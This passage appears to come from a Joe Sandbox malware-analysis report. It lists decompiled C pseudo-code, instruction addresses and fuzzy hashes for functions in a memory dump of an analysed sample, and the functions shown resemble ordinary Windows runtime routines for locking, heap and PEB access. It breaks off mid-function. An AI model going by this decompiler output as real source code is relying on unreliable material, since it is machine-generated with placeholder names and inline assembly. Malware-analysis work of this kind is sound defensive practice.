                                                    0x00a89337
                                                    0x00a89338
                                                    0x00a8933a
                                                    0x00a8933a
                                                    0x00a8933d
                                                    0x00a89342
                                                    0x00a89342
                                                    0x00a89345
                                                    0x00a89349
                                                    0x00a8934e
                                                    0x00a89352
                                                    0x00a89357
                                                    0x00a892f4
                                                    0x00a892f4
                                                    0x00a892f6
                                                    0x00a892f9
                                                    0x00a89300
                                                    0x00a89306
                                                    0x00a89324
                                                    0x00a89324

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 65df42aea9e7b13347ef2f4ac47647e719b5a896feb9034c3d219946add5347f
                                                    • Instruction ID: 66240e8d450c2f13c99e591c5e86770947464f0bb103c91a8bf63286b6f29efe
                                                    • Opcode Fuzzy Hash: 65df42aea9e7b13347ef2f4ac47647e719b5a896feb9034c3d219946add5347f
                                                    • Instruction Fuzzy Hash: D2211632041601DFC722EF68CE45F6AB7B9EF08704F15456CA04A9B6A2CB34E951DB44
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00ABB390 Relevance: .1, Instructions: 63COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 54%
                                                    			E00ABB390(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed char _t12;
				signed int _t16;
				signed int _t21;
				void* _t28;
				signed int _t30;
				signed int _t36;
				signed int _t41;

				_push(__ecx);
				_t41 = _a4 + 0xffffffb8;
				E00AA2280(_t12, 0xb78608);
				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
				asm("sbb edi, edi");
				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
				_v8 = _t36;
				asm("lock cmpxchg [ebx], ecx");
				_t30 = 1;
				if(1 != 1) {
					while(1) {
						_t21 = _t30 & 0x00000006;
						_t16 = _t30;
						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
						asm("lock cmpxchg [edi], esi");
						if(_t16 == _t30) {
							break;
						}
						_t30 = _t16;
					}
					_t36 = _v8;
					if(_t21 == 2) {
						_t16 = E00AC00C2(0xb78608, 0, _t28);
					}
				}
				if(_t36 != 0) {
					_t16 = L00AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
				}
				return _t16;
			}











                                                    0x00abb395
                                                    0x00abb3a2
                                                    0x00abb3a5
                                                    0x00abb3aa
                                                    0x00abb3b2
                                                    0x00abb3ba
                                                    0x00abb3bd
                                                    0x00abb3c0
                                                    0x00abb3c4
                                                    0x00abb3c9
                                                    0x00afa3e9
                                                    0x00afa3ed
                                                    0x00afa3f0
                                                    0x00afa3ff
                                                    0x00afa403
                                                    0x00afa409
                                                    0x00000000
                                                    0x00000000
                                                    0x00afa40b
                                                    0x00afa40b
                                                    0x00afa40f
                                                    0x00afa415
                                                    0x00afa423
                                                    0x00afa423
                                                    0x00afa415
                                                    0x00abb3d1
                                                    0x00abb3e8
                                                    0x00abb3e8
                                                    0x00abb3d9

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 87bbe2d4095a5c2bdf5070448262f1e7a14e7280747b923259e6589a1c5ec64e
                                                    • Instruction ID: 4d44f518e1de297e2c42b5c650ca7bd1a686070478388bf3d4ffa885c8cb3cd0
                                                    • Opcode Fuzzy Hash: 87bbe2d4095a5c2bdf5070448262f1e7a14e7280747b923259e6589a1c5ec64e
                                                    • Instruction Fuzzy Hash: D3116F373151109BCB188B548D81ABB72AAEBD5730B35417DEE1ACB781CE719C01C791
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00B14257 Relevance: .1, Instructions: 60COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 90%
                                                    			E00B14257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t18;
				intOrPtr _t24;
				intOrPtr* _t27;
				intOrPtr* _t30;
				intOrPtr* _t31;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr* _t35;
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t43;

				_t39 = __eflags;
				_t35 = __edi;
				_push(8);
				_push(0xb608d0);
				E00ADD08C(__ebx, __edi, __esi);
				_t37 = __ecx;
				E00B141E8(__ebx, __edi, __ecx, _t39);
				E00A9EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
				_t18 = _t37 + 8;
				_t33 =  *_t18;
				_t27 =  *((intOrPtr*)(_t18 + 4));
				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
					L8:
					_push(3);
					asm("int 0x29");
				} else {
					 *_t27 = _t33;
					 *((intOrPtr*)(_t33 + 4)) = _t27;
					_t35 = 0xb787e4;
					_t18 =  *0xb787e0; // 0x0
					while(_t18 != 0) {
						_t43 = _t18 -  *0xb75cd0; // 0xffffffff
						if(_t43 >= 0) {
							_t31 =  *0xb787e4; // 0x0
							_t18 =  *_t31;
							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
								goto L8;
							} else {
								 *0xb787e4 = _t18;
								 *((intOrPtr*)(_t18 + 4)) = _t35;
								L00A87055(_t31 + 0xfffffff8);
								_t24 =  *0xb787e0; // 0x0
								_t18 = _t24 - 1;
								 *0xb787e0 = _t18;
								continue;
							}
						}
						goto L9;
					}
				}
				L9:
				__eflags =  *0xb75cd0;
				if( *0xb75cd0 <= 0) {
					L00A87055(_t37);
				} else {
					_t30 = _t37 + 8;
					_t34 =  *0xb787e8; // 0x0
					__eflags =  *_t34 - _t35;
					if( *_t34 != _t35) {
						goto L8;
					} else {
						 *_t30 = _t35;
						 *((intOrPtr*)(_t30 + 4)) = _t34;
						 *_t34 = _t30;
						 *0xb787e8 = _t30;
						 *0xb787e0 = _t18 + 1;
					}
				}
				 *(_t38 - 4) = 0xfffffffe;
				return E00ADD0D1(L00B14320());
			}















                                                    0x00b14257
                                                    0x00b14257
                                                    0x00b14257
                                                    0x00b14259
                                                    0x00b1425e
                                                    0x00b14263
                                                    0x00b14265
                                                    0x00b14273
                                                    0x00b14278
                                                    0x00b1427c
                                                    0x00b1427f
                                                    0x00b14281
                                                    0x00b14287
                                                    0x00b142d7
                                                    0x00b142d7
                                                    0x00b142da
                                                    0x00b1428d
                                                    0x00b1428d
                                                    0x00b1428f
                                                    0x00b14292
                                                    0x00b14297
                                                    0x00b1429c
                                                    0x00b142a0
                                                    0x00b142a6
                                                    0x00b142a8
                                                    0x00b142ae
                                                    0x00b142b3
                                                    0x00000000
                                                    0x00b142ba
                                                    0x00b142ba
                                                    0x00b142bf
                                                    0x00b142c5
                                                    0x00b142ca
                                                    0x00b142cf
                                                    0x00b142d0
                                                    0x00000000
                                                    0x00b142d0
                                                    0x00b142b3
                                                    0x00000000
                                                    0x00b142a6
                                                    0x00b1429c
                                                    0x00b142dc
                                                    0x00b142dc
                                                    0x00b142e3
                                                    0x00b14309
                                                    0x00b142e5
                                                    0x00b142e5
                                                    0x00b142e8
                                                    0x00b142ee
                                                    0x00b142f0
                                                    0x00000000
                                                    0x00b142f2
                                                    0x00b142f2
                                                    0x00b142f4
                                                    0x00b142f7
                                                    0x00b142f9
                                                    0x00b14300
                                                    0x00b14300
                                                    0x00b142f0
                                                    0x00b1430e
                                                    0x00b1431f

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d9979803fcab4d7302f72a70b2de10d287cdb58ae37b9ffa45f38763bd6ed7e5
                                                    • Instruction ID: 5acd04cf45a6a5ab09294662002f828e13b82fe1aaef4bc5c62838471cd61f34
                                                    • Opcode Fuzzy Hash: d9979803fcab4d7302f72a70b2de10d287cdb58ae37b9ffa45f38763bd6ed7e5
                                                    • Instruction Fuzzy Hash: C8218C70551700CFC729EF24D945A94BBF1FB85315BA082AEE11ADB2A1DF31D8C1CB81
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00B046A7 Relevance: .1, Instructions: 59COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 93%
                                                    			E00B046A7(signed short* __ecx, unsigned int __edx, char* _a4) {
				signed short* _v8;
				unsigned int _v12;
				intOrPtr _v16;
				signed int _t22;
				signed char _t23;
				short _t32;
				void* _t38;
				char* _t40;

				_v12 = __edx;
				_t29 = 0;
				_v8 = __ecx;
				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				_t38 = L00AA4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
				if(_t38 != 0) {
					_t40 = _a4;
					 *_t40 = 1;
					E00ACF3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
					_t22 = _v12 >> 1;
					_t32 = 0x2e;
					 *((short*)(_t38 + _t22 * 2)) = _t32;
					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
					_t23 = E00ABD268(_t38, 1);
					asm("sbb al, al");
					 *_t40 =  ~_t23 + 1;
					L00AA77F0(_v16, 0, _t38);
				} else {
					 *_a4 = 0;
					_t29 = 0xc0000017;
				}
				return _t29;
			}











                                                    0x00b046b7
                                                    0x00b046ba
                                                    0x00b046c5
                                                    0x00b046c8
                                                    0x00b046d0
                                                    0x00b046d4
                                                    0x00b046e6
                                                    0x00b046e9
                                                    0x00b046f4
                                                    0x00b046ff
                                                    0x00b04705
                                                    0x00b04706
                                                    0x00b0470c
                                                    0x00b04713
                                                    0x00b0471b
                                                    0x00b04723
                                                    0x00b04725
                                                    0x00b046d6
                                                    0x00b046d9
                                                    0x00b046db
                                                    0x00b046db
                                                    0x00b04732

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                                    • Instruction ID: 6c00611cd20c0e13fad2a406cd0e637e0fdb24d4db84664c92311c23b1e8c332
                                                    • Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                                    • Instruction Fuzzy Hash: 9711C272904208BBC7059F5D99819BEBBB9EF96300F1080AAF9448B351DB319D55D7A4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00AB2397 Relevance: .1, Instructions: 59COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 22%
                                                    			E00AB2397(intOrPtr _a4) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t11;
				void* _t19;
				void* _t25;
				void* _t26;
				intOrPtr _t27;
				void* _t28;
				void* _t29;

				_t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
				if( *0xb7848c != 0) {
					L00AAFAD0(0xb78610);
					if( *0xb7848c == 0) {
						E00AAFA00(0xb78610, _t19, _t27, 0xb78610);
						goto L1;
					} else {
						_push(0);
						_push(_a4);
						_t26 = 4;
						_t29 = E00AB2581(0xb78610, 0xa650a0, _t26, _t27, _t28);
						E00AAFA00(0xb78610, 0xa650a0, _t27, 0xb78610);
					}
				} else {
					L1:
					_t11 =  *0xb78614; // 0x0
					if(_t11 == 0) {
						_t11 = E00AC4886(0xa61088, 1, 0xb78614);
					}
					_push(0);
					_push(_a4);
					_t25 = 4;
					_t29 = E00AB2581(0xb78610, (_t11 << 4) + 0xa65070, _t25, _t27, _t28);
				}
				if(_t29 != 0) {
					 *((intOrPtr*)(_t29 + 0x38)) = _t27;
					 *((char*)(_t29 + 0x40)) = 0;
				}
				return _t29;
			}















                                                    0x00ab23b0
                                                    0x00ab23b6
                                                    0x00ab2409
                                                    0x00ab2415
                                                    0x00af5ae9
                                                    0x00000000
                                                    0x00ab241b
                                                    0x00ab241b
                                                    0x00ab241d
                                                    0x00ab2427
                                                    0x00ab242e
                                                    0x00ab2430
                                                    0x00ab2430
                                                    0x00ab23b8
                                                    0x00ab23b8
                                                    0x00ab23b8
                                                    0x00ab23bf
                                                    0x00ab23fc
                                                    0x00ab23fc
                                                    0x00ab23c1
                                                    0x00ab23c3
                                                    0x00ab23d0
                                                    0x00ab23d8
                                                    0x00ab23d8
                                                    0x00ab23dc
                                                    0x00ab23de
                                                    0x00ab23e1
                                                    0x00ab23e1
                                                    0x00ab23ec

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 36e7ac32e34076b99a3c561049e9d0bd0258bfe2decc2dc6f57de2123c3be876
                                                    • Instruction ID: 70278156b565bd21906b671a462c667193a35804a7a1ce9452bc4372bc659bb5
                                                    • Opcode Fuzzy Hash: 36e7ac32e34076b99a3c561049e9d0bd0258bfe2decc2dc6f57de2123c3be876
                                                    • Instruction Fuzzy Hash: 91118E31B443006BD730A739AD45F95B6DCEB50760F154037F60AAB293CEB4DC408754
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00A8C962 Relevance: .1, Instructions: 57COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 42%
                                                    			E00A8C962(char __ecx) {
				signed int _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t19;
				char _t22;
				void* _t26;
				void* _t27;
				char _t32;
				char _t34;
				void* _t35;
				void* _t37;
				intOrPtr* _t38;
				signed int _t39;

				_t41 = (_t39 & 0xfffffff8) - 0xc;
				_v8 =  *0xb7d360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
				_t34 = __ecx;
				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
					_t26 = 0;
					E00A9EEF0(0xb770a0);
					_t29 =  *((intOrPtr*)(_t34 + 0x18));
					if(E00B0F625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
						L9:
						E00A9EB70(_t29, 0xb770a0);
						_t19 = _t26;
						L2:
						_pop(_t35);
						_pop(_t37);
						_pop(_t27);
						return E00ACB640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
					}
					_t29 = _t34;
					_t26 = E00B0F1FC(_t34, _t32);
					if(_t26 < 0) {
						goto L9;
					}
					_t38 =  *0xb770c0; // 0x0
					while(_t38 != 0xb770c0) {
						_t22 =  *((intOrPtr*)(_t38 + 0x18));
						_t38 =  *_t38;
						_v12 = _t22;
						if(_t22 != 0) {
							_t29 = _t22;
							 *0xb7b1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
							_v12();
						}
					}
					goto L9;
				}
				_t19 = 0;
				goto L2;
			}


















                                                    0x00a8c96a
                                                    0x00a8c974
                                                    0x00a8c988
                                                    0x00a8c98a
                                                    0x00af7c9d
                                                    0x00af7c9f
                                                    0x00af7ca4
                                                    0x00af7cae
                                                    0x00af7cf0
                                                    0x00af7cf5
                                                    0x00af7cfa
                                                    0x00a8c992
                                                    0x00a8c996
                                                    0x00a8c997
                                                    0x00a8c998
                                                    0x00a8c9a3
                                                    0x00a8c9a3
                                                    0x00af7cb0
                                                    0x00af7cb7
                                                    0x00af7cbb
                                                    0x00000000
                                                    0x00000000
                                                    0x00af7cbd
                                                    0x00af7ce8
                                                    0x00af7cc5
                                                    0x00af7cc8
                                                    0x00af7cca
                                                    0x00af7cd0
                                                    0x00af7cd6
                                                    0x00af7cde
                                                    0x00af7ce4
                                                    0x00af7ce4
                                                    0x00af7cd0
                                                    0x00000000
                                                    0x00af7ce8
                                                    0x00a8c990
                                                    0x00000000

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a61f5048e7a3ef12cfeacc2ad91faf5c6f15dce42c99084e60460fdf326783e3
                                                    • Instruction ID: a9e98e50bc529eca0630717683e37b7384e642e5cd447dbd162725f6bc8a6d5b
                                                    • Opcode Fuzzy Hash: a61f5048e7a3ef12cfeacc2ad91faf5c6f15dce42c99084e60460fdf326783e3
                                                    • Instruction Fuzzy Hash: F111E53130860A9BCB10EF68CC46A7BB7F5BB84714B110579F945936A1DF20EC55CBD1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00AC37F5 Relevance: .1, Instructions: 57COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 87%
                                                    			E00AC37F5(void* __ecx, intOrPtr* __edx) {
				void* __ebx;
				void* __edi;
				signed char _t6;
				intOrPtr _t13;
				intOrPtr* _t20;
				intOrPtr* _t27;
				void* _t28;
				intOrPtr* _t29;

				_t27 = __edx;
				_t28 = __ecx;
				if(__edx == 0) {
					E00AA2280(_t6, 0xb78550);
				}
				_t29 = E00AC387E(_t28);
				if(_t29 == 0) {
					L6:
					if(_t27 == 0) {
						E00A9FFB0(0xb78550, _t27, 0xb78550);
					}
					if(_t29 == 0) {
						return 0xc0000225;
					} else {
						if(_t27 != 0) {
							goto L14;
						}
						L00AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
						goto L11;
					}
				} else {
					_t13 =  *_t29;
					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
						L13:
						_push(3);
						asm("int 0x29");
						L14:
						 *_t27 = _t29;
						L11:
						return 0;
					}
					_t20 =  *((intOrPtr*)(_t29 + 4));
					if( *_t20 != _t29) {
						goto L13;
					}
					 *_t20 = _t13;
					 *((intOrPtr*)(_t13 + 4)) = _t20;
					asm("btr eax, ecx");
					goto L6;
				}
			}











                                                    0x00ac37fa
                                                    0x00ac37fc
                                                    0x00ac3805
                                                    0x00ac3808
                                                    0x00ac3808
                                                    0x00ac3814
                                                    0x00ac3818
                                                    0x00ac3846
                                                    0x00ac3848
                                                    0x00ac384b
                                                    0x00ac384b
                                                    0x00ac3852
                                                    0x00000000
                                                    0x00ac3854
                                                    0x00ac3856
                                                    0x00000000
                                                    0x00000000
                                                    0x00ac3863
                                                    0x00000000
                                                    0x00ac3863
                                                    0x00ac381a
                                                    0x00ac381a
                                                    0x00ac381f
                                                    0x00ac386e
                                                    0x00ac386e
                                                    0x00ac3871
                                                    0x00ac3873
                                                    0x00ac3873
                                                    0x00ac3868
                                                    0x00000000
                                                    0x00ac3868
                                                    0x00ac3821
                                                    0x00ac3826
                                                    0x00000000
                                                    0x00000000
                                                    0x00ac3828
                                                    0x00ac382a
                                                    0x00ac3841
                                                    0x00000000
                                                    0x00ac3841

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: cca27c84d77b7c04c473b075eaf6bf42f729baa9f6dd3f2eafec423eed4d3936
                                                    • Instruction ID: e77d600817b6ca593a351458a9e8598ed495b8805aaaa605353a4b94fc02a9f5
                                                    • Opcode Fuzzy Hash: cca27c84d77b7c04c473b075eaf6bf42f729baa9f6dd3f2eafec423eed4d3936
                                                    • Instruction Fuzzy Hash: 54018473A456109BCB278B1A9A40F2ABBB6DF96B50B17806DF9498B215DB30DE01C790
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00AB002D Relevance: .1, Instructions: 55COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00AB002D() {
				void* _t11;
				char* _t14;
				signed char* _t16;
				char* _t27;
				signed char* _t29;

				_t11 = E00AA7D50();
				_t27 = 0x7ffe0384;
				if(_t11 != 0) {
					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t14 = 0x7ffe0384;
				}
				_t29 = 0x7ffe0385;
				if( *_t14 != 0) {
					if(E00AA7D50() == 0) {
						_t16 = 0x7ffe0385;
					} else {
						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t16 & 0x00000040) != 0) {
						goto L18;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(E00AA7D50() != 0) {
						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					if( *_t27 != 0) {
						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						if(E00AA7D50() != 0) {
							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
						}
						if(( *_t29 & 0x00000020) == 0) {
							goto L5;
						}
						L18:
						return 1;
					} else {
						L5:
						return 0;
					}
				}
			}








                                                    0x00ab0032
                                                    0x00ab0037
                                                    0x00ab0043
                                                    0x00af4b3a
                                                    0x00ab0049
                                                    0x00ab0049
                                                    0x00ab0049
                                                    0x00ab004e
                                                    0x00ab0053
                                                    0x00af4b48
                                                    0x00af4b5a
                                                    0x00af4b4a
                                                    0x00af4b53
                                                    0x00af4b53
                                                    0x00af4b5f
                                                    0x00000000
                                                    0x00af4b61
                                                    0x00000000
                                                    0x00af4b61
                                                    0x00ab0059
                                                    0x00ab0059
                                                    0x00ab0060
                                                    0x00af4b6f
                                                    0x00af4b6f
                                                    0x00ab0069
                                                    0x00af4b83
                                                    0x00000000
                                                    0x00000000
                                                    0x00af4b90
                                                    0x00af4b9b
                                                    0x00af4b9b
                                                    0x00af4ba4
                                                    0x00000000
                                                    0x00000000
                                                    0x00af4baa
                                                    0x00000000
                                                    0x00ab006f
                                                    0x00ab006f
                                                    0x00000000
                                                    0x00ab006f
                                                    0x00ab0069

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                                    • Instruction ID: e13937d02fc2ca44c0064d7ed158b8e7aaa25adfef3c94af19eef0ec66594376
                                                    • Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                                    • Instruction Fuzzy Hash: F111C4326056858FD722ABA8CA45B7B77E8EF45754F1900A0FE04876A3D728DC41C660
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00A9766D Relevance: .1, Instructions: 54COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 94%
                                                    			E00A9766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				char _v8;
				void* _t22;
				void* _t24;
				intOrPtr _t29;
				intOrPtr* _t30;
				void* _t42;
				intOrPtr _t47;

				_push(__ecx);
				_t36 =  &_v8;
				if(E00ABF3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
					L10:
					_t22 = 0;
				} else {
					_t24 = _v8 + __ecx;
					_t42 = _t24;
					if(_t24 < __ecx) {
						goto L10;
					} else {
						if(E00ABF3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
							goto L10;
						} else {
							_t29 = _v8 + _t42;
							if(_t29 < _t42) {
								goto L10;
							} else {
								_t47 = _t29;
								_t30 = _a16;
								if(_t30 != 0) {
									 *_t30 = _t47;
								}
								if(_t47 == 0) {
									goto L10;
								} else {
									_t22 = L00AA4620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
								}
							}
						}
					}
				}
				return _t22;
			}










                                                    0x00a97672
                                                    0x00a9767f
                                                    0x00a97689
                                                    0x00a976de
                                                    0x00a976de
                                                    0x00a9768b
                                                    0x00a97691
                                                    0x00a97693
                                                    0x00a97697
                                                    0x00000000
                                                    0x00a97699
                                                    0x00a976a8
                                                    0x00000000
                                                    0x00a976aa
                                                    0x00a976ad
                                                    0x00a976b1
                                                    0x00000000
                                                    0x00a976b3
                                                    0x00a976b3
                                                    0x00a976b5
                                                    0x00a976ba
                                                    0x00a976bc
                                                    0x00a976bc
                                                    0x00a976c0
                                                    0x00000000
                                                    0x00a976c2
                                                    0x00a976ce
                                                    0x00a976ce
                                                    0x00a976c0
                                                    0x00a976b1
                                                    0x00a976a8
                                                    0x00a97697
                                                    0x00a976d9

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                                    • Instruction ID: 2f662886b3070d4d6eb7d1de721c7cf61cf46fab707bd65eb1fe46b6e9a643e0
                                                    • Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                                    • Instruction Fuzzy Hash: 29017C32725519ABCB20DE6ECD41E9FB7EDEB85B60B290524BA18CB251DA30DD1187B0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00A89080 Relevance: .1, Instructions: 53COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 69%
                                                    			E00A89080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				intOrPtr* _t51;
				intOrPtr _t59;
				signed int _t64;
				signed int _t67;
				signed int* _t71;
				signed int _t74;
				signed int _t77;
				signed int _t82;
				intOrPtr* _t84;
				void* _t85;
				intOrPtr* _t87;
				void* _t94;
				signed int _t95;
				intOrPtr* _t97;
				signed int _t99;
				signed int _t102;
				void* _t104;

				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t97 = __ecx;
				_t102 =  *(__ecx + 0x14);
				if((_t102 & 0x02ffffff) == 0x2000000) {
					_t102 = _t102 | 0x000007d0;
				}
				_t48 =  *[fs:0x30];
				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
					_t102 = _t102 & 0xff000000;
				}
				_t80 = 0xb785ec;
				E00AA2280(_t48, 0xb785ec);
				_t51 =  *_t97 + 8;
				if( *_t51 != 0) {
					L6:
					return E00A9FFB0(_t80, _t97, _t80);
				} else {
					 *(_t97 + 0x14) = _t102;
					_t84 =  *0xb7538c; // 0x771a6828
					if( *_t84 != 0xb75388) {
						_t85 = 3;
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x2c);
						_push(0xb5f6e8);
						E00ADD0E8(0xb785ec, _t97, _t102);
						 *((char*)(_t104 - 0x1d)) = 0;
						_t99 =  *(_t104 + 8);
						__eflags = _t99;
						if(_t99 == 0) {
							L13:
							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
							if(__eflags == 0) {
								E00B588F5(_t80, _t85, 0xb75388, _t99, _t102, __eflags);
							}
						} else {
							__eflags = _t99 -  *0xb786c0; // 0x6307b0
							if(__eflags == 0) {
								goto L13;
							} else {
								__eflags = _t99 -  *0xb786b8; // 0x0
								if(__eflags == 0) {
									goto L13;
								} else {
									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
									__eflags =  *((char*)(_t59 + 0x28));
									if( *((char*)(_t59 + 0x28)) == 0) {
										E00AA2280(_t99 + 0xe0, _t99 + 0xe0);
										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
										__eflags =  *((char*)(_t99 + 0xe5));
										if(__eflags != 0) {
											E00B588F5(0xb785ec, _t85, 0xb75388, _t99, _t102, __eflags);
										} else {
											__eflags =  *((char*)(_t99 + 0xe4));
											if( *((char*)(_t99 + 0xe4)) == 0) {
												 *((char*)(_t99 + 0xe4)) = 1;
												_push(_t99);
												_push( *((intOrPtr*)(_t99 + 0x24)));
												E00ACAFD0();
											}
